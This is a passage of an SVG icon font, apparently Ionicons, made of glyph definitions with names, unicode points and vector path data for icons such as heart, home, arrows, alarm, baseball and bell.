c-13 -6 -22 -14 -33 -23c-2 -1 -3 -2 -5 -4l-10 -10s-6 -7 -8 -10c-15 -19 -27 -8 -36 -38c-9 -31 -7 -49 -5 -64s13 -22 13 -22c10 15 26 24 44 24c30 0 53 -27 53 -59v-106c0 -32 -26 -59 -58 -59s-52 13 -72 80c-10 32 -16 111 -13 162c3 60 22 108 56 145v0
c8 8 15 16 24 23s19 13 29 18c25 13 53 20 82 20s57 -7 82 -20c10 -5 19 -11 28 -18s17 -15 25 -23v0c34 -37 53 -85 56 -145z" />
    <glyph glyph-name="ion-heart-broken" unicode="&#xf31d;" horiz-adv-x="416" 
d="M181 160c0 -36 -2 -71 4 -107c2 -10 2 -20 2 -31l-153 159c-45 47 -45 124 0 171c40 41 103 43 144 3c-2 -15 -3 -31 -3 -46c-18 -14 -40 -21 -56 -39l11 7c17 11 15 8 35 14c3 1 8 3 11 5c0 -1 -1 -5 -1 -6c1 -20 11 -39 15 -60c0 -5 1 -10 -1 -15c-8 -17 -7 -37 -8 -55
zM274 147c8 -18 23 -29 38 -39l-104 -108l-17 18c0 13 -4 26 -4 38c-2 48 10 94 21 142v0c1 -1 2 -1 3 -1c30 -6 52 -24 63 -50zM382 352c46 -47 46 -124 0 -171l-68 -70c-28 24 -42 54 -65 81c-12 13 -26 23 -41 32c-3 13 -8 26 -11 39c-3 12 14 21 16 31c3 12 3 26 3 39
l19 19c40 42 107 42 147 0z" />
    <glyph glyph-name="ion-heart" unicode="&#xf141;" horiz-adv-x="416" 
d="M382 352c46 -47 46 -124 0 -171l-174 -181l-174 181c-46 47 -46 124 0 171c40 42 107 42 147 0l27 -28l28 28c40 42 106 42 146 0z" />
    <glyph glyph-name="ion-help-buoy" unicode="&#xf27c;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM402 264c-10 24 -23 45 -42 64s-41 32 -65 42l-19 -61c14 -6 27 -15 38 -26s21 -24 27 -38zM224 96c53 0 96 43 96 96s-43 96 -96 96s-96 -43 -96 -96s43 -96 96 -96zM88 328
c-19 -19 -32 -41 -42 -65l61 -19c6 14 15 27 26 38s24 21 38 27l-19 61c-24 -10 -45 -23 -64 -42zM46 120c10 -24 23 -45 42 -64s41 -32 65 -42l19 61c-14 6 -27 15 -38 26s-21 24 -27 38zM360 56c19 19 32 41 42 65l-61 19c-6 -14 -15 -27 -26 -38s-24 -21 -38 -27l19 -61
c24 10 45 23 64 42z" />
    <glyph glyph-name="ion-help-circled" unicode="&#xf142;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM244 89c1 18 -12 31 -29 31c-16 0 -30 -11 -30 -29s12 -30 28 -30c17 0 31 10 31 28zM293 217c7 10 12 22 12 36c0 23 -9 40 -25 52c-17 13 -37 18 -62 18
c-19 0 -34 -4 -47 -13c-19 -13 -28 -34 -28 -68h49c0 9 -1 19 4 27s13 15 26 15s19 -3 25 -11c5 -7 8 -15 8 -23c0 -7 -4 -14 -8 -20c-2 -4 -6 -7 -10 -10c0 0 -26 -15 -35 -30c-7 -11 -9 -24 -10 -41c0 -1 0 -4 4 -4h39s5 3 5 4c0 6 1 15 2 19c2 7 6 12 12 17l14 9
c12 9 21 17 25 23z" />
    <glyph glyph-name="ion-help" unicode="&#xf143;" horiz-adv-x="256" 
d="M217 371c25 -19 39 -46 39 -83c0 -22 -8 -42 -19 -57c-7 -9 -21 -21 -40 -36l-21 -14c-10 -8 -17 -18 -20 -28c-2 -6 -3 -19 -3 -29c0 -2 -1 -6 -7 -6h-62c-7 0 -7 3 -7 5c1 26 4 49 15 66c15 23 57 48 57 48c6 5 11 9 15 15c7 10 12 21 12 32c0 13 -3 26 -11 36
c-10 12 -21 18 -41 18s-32 -11 -40 -24s-7 -29 -7 -43h-77c0 54 14 88 44 108c20 14 45 20 75 20c39 0 70 -7 98 -28zM114 78c27 -1 47 -20 46 -48s-22 -46 -49 -45c-26 1 -46 19 -45 47s22 47 48 46z" />
    <glyph glyph-name="ion-home" unicode="&#xf144;" horiz-adv-x="384" 
d="M384 160h-48v-160h-96v128h-96v-128h-96v160h-48l192 224z" />
    <glyph glyph-name="ion-icecream" unicode="&#xf27d;" horiz-adv-x="320" 
d="M32 192h256l-128 -224zM307 275c8 -5 13 -13 13 -23c0 -16 -14 -28 -30 -28h-4h-252h-4c-16 0 -30 13 -30 28c0 10 6 18 14 23c1 0 1 2 2 2c4 3 7 7 8 12v1c-2 6 -2 12 -2 18c0 42 34 76 76 76c8 0 16 -2 23 -4c-3 -12 -4 -31 -4 -31c2 15 11 29 11 29c18 23 46 38 77 38
c53 0 96 -43 96 -96c0 -11 -2 -21 -5 -30v-1c0 -4 4 -9 8 -12c1 0 2 -2 3 -2z" />
    <glyph glyph-name="ion-image" unicode="&#xf147;" 
d="M336 224c-26 0 -48 22 -48 48s22 48 48 48s48 -22 48 -48s-22 -48 -48 -48zM420 384c16 0 28 -12 28 -28v-328c0 -16 -12 -28 -28 -28h-392c-16 0 -28 12 -28 28v328c0 16 12 28 28 28h392zM317 186l99 -106v260c0 7 -6 12 -13 12h-358c-7 0 -12 -5 -13 -12v-260l126 152
c4 4 10 8 17 8s13 -2 17 -7l54 -59l4 -4c3 -2 7 -4 11 -4s8 2 12 5l18 16c4 3 8 5 13 5s10 -2 13 -6z" />
    <glyph glyph-name="ion-images" unicode="&#xf148;" 
d="M426 308c13 -1 23 -12 22 -24l-14 -263c-1 -13 -12 -22 -25 -21l-330 16c-13 1 -23 10 -22 23l2 46l-15 -1c-12 -1 -22 7 -23 18l-21 236c-1 11 7 21 19 22l296 24c12 1 22 -7 23 -18l5 -54zM71 302c1 12 11 22 24 22l219 -11l-2 31h-1v1c-1 5 -5 8 -10 8l-261 -22
c-5 0 -10 -4 -10 -9v0v-1l16 -178l18 25zM405 66l10 198v1v0c0 6 -5 10 -11 10l-58 3l-29 2l-204 9c-6 0 -11 -4 -12 -9v0v-1l-3 -63l-7 -128v-7l6 7l102 109c4 4 8 6 14 6s11 -3 14 -7l43 -49l3 -3c2 -2 6 -4 10 -4s5 1 9 3l17 12c4 3 7 4 11 4s9 -2 11 -5l27 -33zM341 186
c-20 0 -35 15 -35 35s16 35 35 35c20 0 35 -16 35 -35s-16 -35 -35 -35z" />
    <glyph glyph-name="ion-information-circled" unicode="&#xf149;" 
d="M448 195c2 -124 -97 -225 -221 -227s-225 97 -227 221s97 225 221 227s225 -97 227 -221zM224 336c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM268 53v11h-22v172h-66v-12h22v-160h-22v-11h88z" />
    <glyph glyph-name="ion-information" unicode="&#xf14a;" horiz-adv-x="128" 
d="M96 0h32v-16h-128v16h32v240h-32v16h96v-256zM64 304c-27 0 -48 21 -48 48s21 48 48 48s48 -21 48 -48s-21 -48 -48 -48z" />
    <glyph glyph-name="ion-ionic" unicode="&#xf14b;" horiz-adv-x="416" 
d="M376 315c25 -34 40 -77 40 -123c0 -115 -93 -208 -208 -208s-208 93 -208 208s93 208 208 208c46 0 89 -15 123 -40c5 3 11 5 18 5c18 0 32 -14 32 -32c0 -7 -2 -13 -5 -18zM344 56c18 18 31 38 41 61c10 24 15 49 15 75s-5 51 -15 75c-6 13 -13 26 -21 38
c-4 -2 -10 -4 -15 -4c-18 0 -32 14 -32 32c0 5 2 11 4 15c-12 8 -25 15 -38 21c-24 10 -49 15 -75 15s-51 -5 -75 -15c-23 -10 -43 -23 -61 -41s-31 -38 -41 -61c-10 -24 -15 -49 -15 -75s5 -51 15 -75c10 -23 23 -43 41 -61s38 -31 61 -41c24 -10 49 -15 75 -15s51 5 75 15
c23 10 43 23 61 41zM112 192c0 64 32 96 96 96s96 -32 96 -96s-32 -96 -96 -96s-96 32 -96 96z" />
    <glyph glyph-name="ion-ios-alarm-outline" unicode="&#xf3c7;" horiz-adv-x="404" 
d="M384 256l-54 52l-9 -9c35 -32 57 -79 57 -130c0 -44 -16 -83 -43 -114l36 -45l-12 -10l-35 43c-32 -30 -75 -49 -122 -49v0v0c-47 0 -90 19 -122 49l-35 -43l-12 10l36 45c-27 31 -43 71 -43 115c0 51 22 97 57 129l-9 9l-54 -52c-12 14 -20 32 -20 52c0 44 35 80 80 82
h5c20 0 39 -7 54 -18l-54 -52l11 -11c26 19 56 32 90 35v0c0 8 8 16 16 16s15 -8 15 -16v0c34 -3 65 -16 91 -35l11 11l-54 52c15 11 34 18 54 18h5c45 -2 80 -38 80 -82c0 -20 -8 -38 -20 -52zM22 280l91 89c-9 5 -19 7 -32 6c-37 -2 -65 -32 -65 -67c0 -10 2 -19 6 -28z
M362 172c0 88 -72 158 -160 158s-160 -70 -160 -158s72 -158 160 -158s160 70 160 158zM291 369l91 -89c4 9 6 18 6 28c0 35 -28 65 -65 67c-13 1 -23 -1 -32 -6zM202 288h16v-144h-112v16h96v128z" />
    <glyph glyph-name="ion-ios-alarm" unicode="&#xf3c8;" horiz-adv-x="404" 
d="M385 256l-55 52l-9 -9c35 -32 57 -79 57 -130c0 -44 -16 -83 -43 -114l37 -45l-13 -10l-35 43c-32 -30 -75 -49 -122 -49v0v0c-47 0 -90 19 -122 49l-35 -43l-12 10l36 45c-27 31 -43 70 -43 114c0 51 22 98 57 130l-9 9l-54 -52c-12 14 -20 32 -20 52c0 44 35 80 80 82
h5c20 0 39 -7 54 -18l-54 -53l11 -10c26 19 56 32 90 35v0c0 8 8 16 16 16s15 -8 15 -16v0c34 -3 65 -16 91 -35l11 11l-54 52c15 11 34 18 54 18h5c45 -2 80 -38 80 -82c0 -20 -7 -38 -19 -52zM218 144v144h-16v-128h-96v-16h112z" />
    <glyph glyph-name="ion-ios-albums-outline" unicode="&#xf3c9;" 
d="M432 304h-416v-288h416v288zM448 320v0v-320h-448v320h448zM40 336v16h368v-16h-368zM72 368v16h304v-16h-304z" />
    <glyph glyph-name="ion-ios-albums" unicode="&#xf3ca;" 
d="M448 320v0v-320h-448v320h448zM40 336v16h368v-16h-368zM72 368v16h304v-16h-304z" />
    <glyph glyph-name="ion-ios-americanfootball-outline" unicode="&#xf3cb;" horiz-adv-x="416" 
d="M331 315c112 -112 81 -327 81 -327s-26 -4 -65 -4c-73 0 -189 12 -262 85c-112 112 -81 327 -81 327s26 4 65 4c73 0 189 -12 262 -85zM17 383c-2 -19 -5 -60 0 -107c1 -8 2 -16 3 -23l127 127c-25 3 -51 5 -78 5v0v0c-22 0 -41 -1 -52 -2zM96 80c30 -30 72 -53 124 -66
c10 -3 20 -5 31 -7l142 142c-4 22 -10 44 -17 63c-14 37 -32 68 -56 92c-30 30 -72 53 -124 66c-10 3 -20 5 -31 7l-142 -142c4 -22 10 -44 17 -63c14 -37 32 -68 56 -92zM399 1c2 19 5 60 0 107c-1 8 -2 16 -3 23l-127 -127c25 -3 51 -5 78 -5c22 0 41 1 52 2zM259 130
l-28 -29l-12 12l29 28l-23 23l-28 -29l-12 12l29 28l-23 23l-28 -29l-12 12l29 28l-23 23l-28 -29l-12 12l29 28l-22 23l-29 -29l-11 12l67 67l12 -11l-29 -29l23 -22l28 29l12 -12l-29 -28l23 -23l28 29l12 -12l-29 -28l23 -23l28 29l12 -12l-29 -28l22 -23l29 29l12 -12
l-29 -28l22 -23l29 29l11 -12l-67 -67l-12 11l29 29z" />
    <glyph glyph-name="ion-ios-americanfootball" unicode="&#xf3cc;" horiz-adv-x="416" 
d="M331 315c112 -112 81 -327 81 -327s-26 -4 -65 -4c-73 0 -189 12 -262 85c-112 112 -81 327 -81 327s26 4 65 4c73 0 189 -12 262 -85zM20 253l3 -18l142 142l-18 3zM219 113l12 -12l28 29l23 -22l-29 -29l12 -11l67 67l-11 12l-29 -29l-22 23l29 28l-12 12l-28 -29
l-23 23l29 28l-12 12l-28 -29l-23 23l29 28l-12 12l-28 -29l-23 23l29 28l-12 12l-28 -29l-23 22l29 29l-12 11l-67 -67l11 -12l29 29l22 -23l-29 -28l12 -12l28 29l23 -23l-29 -28l12 -12l28 29l23 -23l-29 -28l12 -12l28 29l23 -23zM269 4l127 127l-3 18l-142 -142z" />
    <glyph glyph-name="ion-ios-analytics-outline" unicode="&#xf3cd;" 
d="M224 400c-28 0 -55 -5 -81 -16c-25 -10 -47 -26 -66 -45s-35 -41 -45 -66c-11 -26 -16 -53 -16 -81s5 -55 16 -81c10 -25 26 -47 45 -66s41 -35 66 -45c26 -11 53 -16 81 -16s55 5 81 16c25 10 47 26 66 45s35 41 45 66c11 26 16 53 16 81s-5 55 -16 81
c-10 25 -26 47 -45 66s-41 35 -66 45c-26 11 -53 16 -81 16zM224 416v0c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM76 128c-25 0 -41 18 -42 19c-3 3 -2 9 1 12s8 2 11 -1c1 -1 15 -17 36 -14c12 2 27 26 38 42c4 6 9 12 12 16
c17 21 34 23 45 21c24 -3 45 -28 54 -50c7 -18 18 -28 32 -29c15 -1 31 11 43 30c1 2 3 4 4 7c9 17 24 43 52 43c31 0 52 -35 53 -36c2 -4 1 -9 -3 -11s-9 -1 -11 3c0 0 -5 8 -12 15c-6 6 -16 13 -27 13c-18 0 -29 -19 -38 -35c-1 -3 -3 -5 -4 -7c-15 -25 -36 -40 -58 -38
c-20 1 -36 15 -46 39s-28 39 -41 41c-11 1 -21 -4 -31 -16c-3 -4 -6 -9 -10 -15c-14 -20 -31 -45 -50 -48c-3 0 -5 -1 -8 -1z" />
    <glyph glyph-name="ion-ios-analytics" unicode="&#xf3ce;" 
d="M224 416c124 0 224 -100 224 -224c0 -13 -1 -25 -3 -37c-1 -6 -2 -12 -3 -17c-24 -98 -113 -170 -218 -170c-122 0 -221 98 -224 219v5c0 9 1 17 2 26c13 111 107 198 222 198zM431 168c1 8 1 16 1 24c0 28 -5 55 -16 81c-10 25 -26 47 -45 66s-41 35 -66 45
c-26 11 -53 16 -81 16s-55 -5 -81 -16c-25 -10 -47 -26 -66 -45s-35 -41 -45 -66c-11 -26 -16 -53 -16 -81v0c14 -21 29 -34 29 -34h1v-1c1 -1 15 -16 36 -13c12 2 27 26 38 42c4 6 9 12 12 16c17 21 34 23 45 21c24 -3 45 -27 54 -50c7 -18 18 -28 32 -29c15 -1 31 9 43 29
c1 2 3 4 4 7c9 17 24 44 52 44c31 0 52 -35 53 -36c3 -4 9 -12 16 -20z" />
    <glyph glyph-name="ion-ios-arrow-back" unicode="&#xf3cf;" horiz-adv-x="192" 
d="M192 320l-127 -128l127 -128l-32 -32l-160 160v0v0l160 160z" />
    <glyph glyph-name="ion-ios-arrow-down" unicode="&#xf3d0;" horiz-adv-x="320" 
d="M301 288l19 -21l-160 -171l-160 171l19 21l141 -150z" />
    <glyph glyph-name="ion-ios-arrow-forward" unicode="&#xf3d1;" horiz-adv-x="192" 
d="M0 320l32 32l160 -160v0v0l-160 -160l-32 32l127 128z" />
    <glyph glyph-name="ion-ios-arrow-left" unicode="&#xf3d2;" horiz-adv-x="192" 
d="M192 333l-150 -141l150 -141l-21 -19l-171 160l171 160z" />
    <glyph glyph-name="ion-ios-arrow-right" unicode="&#xf3d3;" horiz-adv-x="192" 
d="M0 333l21 19l171 -160l-171 -160l-21 19l150 141z" />
    <glyph glyph-name="ion-ios-arrow-thin-down" unicode="&#xf3d4;" horiz-adv-x="192" 
d="M190 126c2 -2 2 -4 2 -6s0 -4 -2 -6c0 0 -87 -79 -88 -80s-3 -2 -6 -2s-5 1 -6 2s-88 80 -88 80c-3 3 -3 9 0 12s9 3 12 0l74 -67v285c0 4 4 8 8 8s8 -4 8 -8v-285l74 67c3 3 9 3 12 0z" />
    <glyph glyph-name="ion-ios-arrow-thin-left" unicode="&#xf3d5;" horiz-adv-x="320" 
d="M94 98c-2 -2 -4 -2 -6 -2s-4 0 -6 2c0 0 -79 87 -80 88s-2 3 -2 6s1 5 2 6s80 88 80 88c3 3 9 3 12 0s3 -9 0 -12l-67 -74h285c4 0 8 -4 8 -8s-4 -8 -8 -8h-285l67 -74c3 -3 3 -9 0 -12z" />
    <glyph glyph-name="ion-ios-arrow-thin-right" unicode="&#xf3d6;" horiz-adv-x="320" 
d="M226 98c-3 3 -3 9 0 12l67 74h-285c-4 0 -8 4 -8 8s4 8 8 8h285l-67 74c-3 3 -3 9 0 12s9 3 12 0c0 0 79 -87 80 -88s2 -3 2 -6s-1 -5 -2 -6s-80 -88 -80 -88c-2 -2 -4 -2 -6 -2s-4 0 -6 2z" />
    <glyph glyph-name="ion-ios-arrow-thin-up" unicode="&#xf3d7;" horiz-adv-x="192" 
d="M190 258c-3 -3 -9 -3 -12 0l-74 67v-285c0 -4 -4 -8 -8 -8s-8 4 -8 8v285l-74 -67c-3 -3 -9 -3 -12 0s-3 9 0 12c0 0 87 79 88 80s3 2 6 2s5 -1 6 -2s88 -80 88 -80c2 -2 2 -4 2 -6s0 -4 -2 -6z" />
    <glyph glyph-name="ion-ios-arrow-up" unicode="&#xf3d8;" horiz-adv-x="320" 
d="M301 96l-141 150l-141 -150l-19 21l160 171l160 -171z" />
    <glyph glyph-name="ion-ios-at-outline" unicode="&#xf3d9;" horiz-adv-x="255" 
d="M236 127v1h19l-3 -6c-3 -6 -13 -19 -22 -27s-18 -14 -28 -20s-21 -10 -32 -13s-23 -5 -34 -5c-16 0 -33 3 -49 8s-30 13 -43 24c-12 11 -26 29 -34 46c-7 16 -10 33 -10 58c0 18 4 38 11 55c7 16 17 30 29 42s27 21 43 28c15 6 33 9 53 9c16 0 32 -3 46 -8
c15 -5 28 -12 39 -22s17 -21 24 -35c6 -13 8 -26 8 -44c0 -14 -2 -28 -7 -40s-9 -20 -17 -30c-8 -9 -13 -15 -23 -21c-11 -6 -20 -9 -29 -9c-8 0 -15 2 -20 7c-3 2 -5 6 -6 9c-6 -6 -11 -10 -17 -12c-10 -3 -18 -4 -26 -4s-15 1 -21 4s-12 7 -17 12s-8 11 -11 18
s-5 14 -5 22c0 12 3 24 7 36v2c4 11 5 16 13 26c8 11 17 19 28 26s24 11 38 11c12 0 21 -3 31 -9c7 -4 12 -10 16 -16l6 17h18l-38 -102c-2 -5 -4 -10 -5 -14s-1 -7 -1 -10c0 -2 1 -4 3 -5s4 -2 8 -2c6 0 11 2 20 7c8 4 12 9 19 17c6 8 10 14 14 25s6 23 6 35
c0 15 -2 25 -7 36c-6 13 -10 22 -19 30s-20 15 -33 20s-27 7 -42 7c-19 0 -35 -3 -48 -9c-15 -6 -27 -14 -37 -24c-11 -10 -19 -23 -25 -37c-6 -15 -10 -32 -10 -48c0 -22 2 -36 8 -49c6 -15 17 -31 28 -41s24 -18 38 -23s30 -7 46 -7c10 0 20 1 30 4s18 6 27 11
s17 11 24 18s14 13 19 21zM147 154c4 5 8 12 11 20l21 57c-2 5 -4 10 -7 13c-3 4 -6 6 -10 8c-1 0 -1 1 -2 1c-3 2 -5 3 -9 4c-5 1 -9 2 -13 2c-10 0 -19 -3 -28 -9s-17 -13 -23 -22c-5 -8 -7 -11 -10 -20c0 -1 -1 -3 -1 -4c-4 -11 -5 -20 -5 -30c0 -6 1 -11 3 -16
s5 -9 8 -13s7 -6 12 -8s9 -3 15 -3c4 0 9 1 14 2c4 1 8 2 12 5s8 7 12 13z" />
    <glyph glyph-name="ion-ios-at" unicode="&#xf3da;" horiz-adv-x="256" 
d="M228 128v0h28c-1 -1 -2 -4 -3 -6c-4 -6 -14 -19 -23 -27s-18 -14 -28 -20s-20 -10 -32 -13c-11 -3 -23 -5 -34 -5c-16 0 -33 3 -49 8s-30 13 -43 24c-12 10 -26 28 -34 46c-7 16 -10 33 -10 58c0 19 4 39 11 55s17 30 29 42s28 21 44 28c15 6 32 9 52 9c16 0 31 -3 46 -8
s28 -12 39 -22s18 -22 25 -36c6 -14 8 -26 8 -44c0 -14 -2 -28 -7 -40c-4 -11 -9 -20 -17 -30c-7 -9 -14 -16 -24 -22c-12 -6 -21 -9 -30 -9s-16 2 -22 8c-2 1 -3 3 -4 5c-4 -4 -9 -6 -14 -8c-10 -3 -18 -5 -27 -5c-8 0 -16 2 -23 5s-12 7 -17 12s-9 12 -12 19s-4 14 -4 22
c0 12 2 25 6 37l1 1c4 10 5 17 13 27c8 11 17 20 28 27c12 7 24 10 38 10c12 0 22 -3 33 -9c5 -3 8 -6 12 -10l5 12h25l-39 -104c-2 -5 -3 -9 -4 -13c-1 -3 -1 -7 -1 -9s0 -3 1 -3c0 0 1 -1 5 -1c5 0 11 2 19 7c7 4 10 8 16 16s9 13 13 23s6 20 6 32c0 14 -1 24 -6 34
c-5 12 -10 21 -18 28c-9 8 -19 14 -31 18s-26 7 -40 7c-18 0 -32 -3 -44 -8c-14 -6 -25 -13 -35 -23s-18 -22 -24 -35c-6 -14 -9 -30 -9 -45c0 -21 3 -34 8 -46c6 -14 16 -30 26 -39s22 -16 35 -21c14 -5 28 -7 43 -7c10 0 20 2 29 4s18 6 26 11s28 20 38 33zM144 157
c4 5 7 12 10 19l20 55c-1 4 -3 7 -5 9c-3 3 -6 6 -9 8h-1h-1v1c-3 2 -5 2 -8 3c-4 1 -8 1 -12 1c-9 0 -17 -2 -25 -7c-10 -6 -17 -14 -21 -21c-5 -8 -6 -11 -9 -19c0 -1 -1 -2 -1 -3c-3 -10 -6 -19 -6 -28c0 -5 1 -10 3 -14s4 -8 7 -11s7 -6 11 -8s8 -2 13 -2c4 0 8 0 12 1
v0c4 1 7 2 11 5c3 2 7 5 11 11z" />
    <glyph glyph-name="ion-ios-barcode-outline" unicode="&#xf3db;" horiz-adv-x="416" 
d="M0 64v256h80v-16h-64v-224h64v-16h-80zM336 320h80v-256h-80v16h64v224h-64v16zM64 128v128h16v-128h-16zM336 128v128h16v-128h-16zM272 96v192h16v-192h-16zM128 96v192h16v-192h-16zM199 112v160h16v-160h-16z" />
    <glyph glyph-name="ion-ios-barcode" unicode="&#xf3dc;" horiz-adv-x="416" 
d="M0 320h416v-256h-416v256zM80 128v128h-16v-128h16zM144 96v192h-16v-192h16zM215 112v160h-16v-160h16zM288 96v192h-16v-192h16zM352 128v128h-16v-128h16z" />
    <glyph glyph-name="ion-ios-baseball-outline" unicode="&#xf3dd;" horiz-adv-x="416" 
d="M415 169v-1v0c-11 -97 -90 -174 -187 -183v0h-2c-2 0 -3 -1 -5 -1h-1h-3h-1h-8c-115 0 -208 93 -208 208v8v1v3v1c0 2 1 3 1 5v2v0c9 97 86 176 183 187v0v0c8 1 16 1 24 1c115 0 208 -93 208 -208c0 -7 0 -14 -1 -20v0v-3zM399 192c0 105 -86 191 -191 191
c-3 0 -5 -1 -8 -1c0 -11 2 -21 4 -31l20 6l5 -15l-21 -7c2 -7 4 -14 7 -21c2 -5 5 -11 8 -16l17 12l9 -13l-19 -13c7 -12 16 -23 26 -33l14 15l12 -12l-15 -15c11 -10 22 -18 34 -25l12 18l14 -9l-12 -17c5 -2 10 -5 15 -7c7 -3 14 -5 22 -7l7 20l15 -5l-6 -19
c10 -2 20 -4 30 -4c0 3 1 5 1 8zM17 192c0 -105 86 -191 191 -191h4c-1 9 -1 17 -3 26l-22 -7l-5 16l23 7c-2 8 -5 16 -8 24c-2 5 -4 9 -6 14l-20 -13l-9 13l21 14c-7 12 -16 24 -26 35l-17 -17l-11 11l17 17c-10 10 -22 18 -34 25l-14 -21l-14 9l14 20c-5 2 -10 5 -15 7
c-7 3 -15 6 -23 8l-8 -24l-15 5l7 23c-9 2 -18 2 -27 3v-4zM228 2c88 9 158 78 169 166c-11 1 -23 3 -34 5l-9 -27l-15 5l8 25c-14 4 -28 10 -41 17l-15 -23l-13 9l14 21c-13 8 -26 17 -37 28l-19 -19l-11 11l19 19c-10 11 -19 23 -27 36l-21 -14l-9 13l22 15
c-7 13 -12 27 -16 41l-25 -8l-5 16l26 8c-2 12 -4 23 -5 35c-88 -11 -157 -81 -166 -169c10 -1 21 -2 31 -4l8 23l15 -5l-7 -22c14 -4 28 -9 42 -16l13 19l14 -9l-13 -18c13 -8 25 -17 36 -28l17 17l11 -11l-17 -17c11 -12 20 -24 28 -37l19 13l9 -14l-20 -13
c7 -14 12 -28 16 -42l23 7l5 -15l-24 -8c2 -10 3 -20 4 -30z" />
    <glyph glyph-name="ion-ios-baseball" unicode="&#xf3de;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208c0 -8 0 -16 -1 -24v0v0c-12 -104 -100 -184 -207 -184c-115 0 -208 93 -208 208c0 107 80 195 184 207v0v0c8 1 16 1 24 1zM212 1c5 0 11 0 16 1c-1 10 -2 20 -4 30l24 8l-5 15l-23 -7c-4 14 -9 28 -16 42l20 13l-9 14l-19 -13
c-8 13 -17 25 -28 37l17 17l-11 11l-17 -17c-11 11 -23 20 -36 28l13 18l-14 9l-13 -19c-14 7 -28 12 -42 16l7 22l-15 5l-8 -23c-10 2 -21 3 -31 4c-1 -5 -1 -11 -1 -16c9 -1 18 -1 27 -3l-7 -23l15 -5l8 24c8 -2 16 -5 23 -8c5 -2 10 -5 15 -7l-14 -20l14 -9l14 21
c12 -7 24 -15 34 -25l-17 -17l11 -11l17 17c10 -11 19 -23 26 -35l-21 -14l9 -13l20 13c2 -5 4 -9 6 -14c3 -8 6 -16 8 -24l-23 -7l5 -16l22 7c2 -8 2 -17 3 -26zM363 173c11 -2 23 -4 34 -5c1 5 1 11 1 16c-10 1 -20 2 -30 4l6 19l-15 5l-7 -20c-8 2 -15 4 -22 7
c-5 2 -10 5 -15 7l12 17l-14 9l-12 -18c-12 7 -23 15 -34 25l15 15l-12 12l-15 -15c-10 10 -18 21 -25 33l19 13l-9 13l-17 -12c-3 5 -6 11 -8 16c-3 7 -5 14 -7 21l21 7l-5 15l-20 -6c-2 10 -3 20 -4 31c-5 0 -11 0 -16 -1c1 -12 3 -23 5 -35l-26 -8l5 -16l25 8
c4 -14 9 -28 16 -41l-22 -15l9 -13l21 14c8 -13 17 -25 27 -36l-19 -19l11 -11l19 19c11 -11 24 -20 37 -28l-14 -21l13 -9l15 23c13 -7 27 -13 41 -17l-8 -25l15 -5z" />
    <glyph glyph-name="ion-ios-basketball-outline" unicode="&#xf3df;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM399 192c0 55 -24 105 -62 140c-14 -34 -31 -65 -52 -95c15 -12 31 -21 49 -29c21 -9 43 -14 65 -16v0zM325 343c-32 25 -73 40 -117 40v0c2 -22 6 -44 15 -65
c10 -25 26 -47 45 -66c2 -1 2 -3 4 -4c20 29 38 60 52 93c0 1 1 1 1 2zM192 382c-51 -4 -96 -29 -128 -65c64 -28 121 -69 169 -119c11 12 21 24 30 37c-40 37 -67 89 -71 147zM233 174c-15 -16 -31 -30 -48 -44c28 -35 45 -79 47 -127c33 4 63 17 88 35
c-22 50 -51 95 -87 136zM214 178l8 8l-10 10c-46 46 -99 82 -158 108c-18 -25 -31 -55 -35 -88c62 -3 116 -31 155 -74c14 11 27 23 40 36zM18 200c0 -3 -1 -5 -1 -8c0 -45 16 -87 43 -120c36 16 71 36 102 60l-7 7c-19 19 -41 35 -66 45c-22 9 -46 15 -71 16zM71 59
c35 -36 83 -58 137 -58c3 0 5 1 8 1c-1 25 -6 48 -16 71c-7 17 -17 33 -28 47c-31 -24 -65 -45 -101 -61zM333 48c37 32 61 77 65 128c-46 3 -89 21 -123 48c-10 -13 -20 -26 -31 -38c36 -41 67 -87 89 -138z" />
    <glyph glyph-name="ion-ios-basketball" unicode="&#xf3e0;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM333 48c-22 51 -53 97 -89 138c11 12 21 25 31 38c34 -27 77 -45 123 -48c0 5 1 11 1 16c-22 2 -44 7 -65 16c-18 8 -34 17 -49 29c21 30 38 61 52 95c-4 4 -8 8 -12 11
c0 -1 -1 -1 -1 -2c-14 -33 -32 -64 -52 -93c-2 1 -2 2 -4 4c-19 19 -35 41 -45 66c-9 21 -13 43 -15 65c-5 0 -11 -1 -16 -1c4 -58 31 -110 71 -147c-9 -13 -19 -25 -30 -37c-48 50 -105 91 -169 119c-4 -4 -7 -9 -10 -13c59 -26 112 -62 158 -108l10 -10l-8 -8
c-13 -13 -26 -25 -40 -36c-39 43 -93 71 -155 74c-1 -5 -1 -11 -1 -16c25 -1 49 -7 71 -16c25 -10 47 -26 66 -45l7 -7c-31 -24 -66 -44 -102 -60c4 -4 7 -9 11 -13c36 16 70 37 101 61c11 -14 21 -30 28 -47c10 -23 15 -46 16 -71c5 0 11 0 16 1c-2 48 -19 92 -47 127
c17 14 33 28 48 44c36 -41 65 -86 87 -136c4 3 9 6 13 10z" />
    <glyph glyph-name="ion-ios-bell-outline" unicode="&#xf3e1;" horiz-adv-x="384" 
d="M318 222c0 -114 28 -126 66 -158h-384c38 32 66 44 66 158c0 98 53 130 102 138v2c0 12 11 22 24 22s24 -10 24 -22v-2c49 -7 102 -40 102 -138zM43 80h298c-25 25 -40 58 -40 142c0 46 -13 80 -37 101c-23 19 -52 23 -72 23s-49 -4 -72 -23c-25 -21 -37 -55 -37 -101
c0 -51 -5 -85 -17 -110c-6 -13 -14 -23 -23 -32zM192 0c-27 0 -49 20 -52 43h104c-3 -23 -25 -43 -52 -43z" />
    <glyph glyph-name="ion-ios-bell" unicode="&#xf3e2;" horiz-adv-x="384" 
d="M318 222c0 -114 28 -126 66 -158h-384c38 32 66 44 66 158c0 98 53 130 102 138v2c0 12 11 22 24 22s24 -10 24 -22v-2c49 -7 102 -40 102 -138zM192 0c-27 0 -49 20 -52 43h104c-3 -23 -25 -43 -52 -43z" />
